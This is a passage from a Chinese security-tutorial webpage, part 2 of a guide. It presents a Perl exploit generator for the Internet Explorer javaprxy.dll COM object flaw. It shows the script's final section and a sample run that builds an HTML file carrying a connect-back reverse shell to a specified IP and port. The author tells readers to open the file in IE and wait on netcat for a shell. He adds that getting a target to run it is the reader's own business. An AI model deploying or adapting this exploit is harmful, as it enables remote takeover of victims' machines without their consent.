IE javaprxy.dll COM Object漏洞利用程序 - 晨风资讯网 - asp教程,php教程,jsp教程,asp.net教程,sql教程,FLASH教程

网站首页

教程下载

源码下载

字体下载

新闻资讯┊网络冲浪┊网页设计┊网络编程┊图形图像┊数据库┊网络媒体┊服务器┊网络安全┊网站运营┊软件教程┊黑客┊认证┊Wap技术

教程搜索：

高级搜索网站信息查询工具

首页 > 网络安全 > 安全防范 > 正文

IE javaprxy.dll COM Object漏洞利用程序
日期：2006-1-21 9:34:07 来源：网络作者：无名浏览:次

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < [url]http://www.frsirt.com[/url] >\n".
"reverse shellcode by 无敌最寂寞[EST]\n".
"Solution - [url]http://www.frsirt.com/english/advisories/2005/0935[/url]".
"</body><script>location.reload();</script></html>";

open(FILE,">$file") || die "[+]ERROR!open file failed!\n";
print FILE "$header $jedi $code $footer";
close FILE;
print "DONE\n\n";
print "CHECK if it does WORK!\n";

程序的帮助信息如下：

H:\temp>doomie.pl
    Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit

          connect back shell rewritten by 无敌最寂寞[EST]

Usage:
    doomie.pl <connect-back-ip> <connect-back-port> [destination file]

Attention:if [destination file] is omitted,superlone.html will be default!

[-]ERROR! connect back ip must be specified!

参数前两个我就不用多说了吧，最后一个是要生成的文件的文件名，比如dest.html，如果省略默认的文件名是superlone.html。

好，我们来实际生成一个看看：

H:\temp>doomie.pl 222.133.151.197 1314
    Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit

          connect back shell rewritten by 无敌最寂寞[EST]

Usage:
    doomie.pl <connect-back-ip> <connect-back-port> [destination file]

Attention:if [destination file] is omitted,superlone.html will be default!

[+]Generating Shellcode ......DONE
[+]Creating exploitable file ......DONE

CHECK if it does WORK!

这样在程序的同目录下生成了一个默认文件名superlone.html的文件。
用ie打开它就会引发溢出，如果你 lucky enough，那就去你的nc检查一下看看是不是得到shell了吧。。
至于怎么让目标机器运行，那是你的事啦，与我无关的说！

以下是我在远程机器上测试后的截图,在此我要感谢论坛的xyzreg兄帮忙测试:

刚才在测试当中又发现了几个错误，现已一一修改了~~~

本新闻共2

本教程共2页,当前在第2页 1 2

建立全面的网络安全体系

计算机加密反跟踪技术密文技术

返回列表打印此页加入收藏资讯论坛关闭窗口点击复制本页地址，发送给QQ/MSN好友

	关于我们 - 联系我们 - 版权声明 - 帮助(？) - 广告服务 - 友情链接 - 服务项目 - 人才招聘
	2003-2008 版权所有 © 晨风资讯网未经授权禁止复制或建立镜像
	CopyRight 2003-2008 www.Net118.com,All Rights Reserved.Design By ChenFeng Network Studio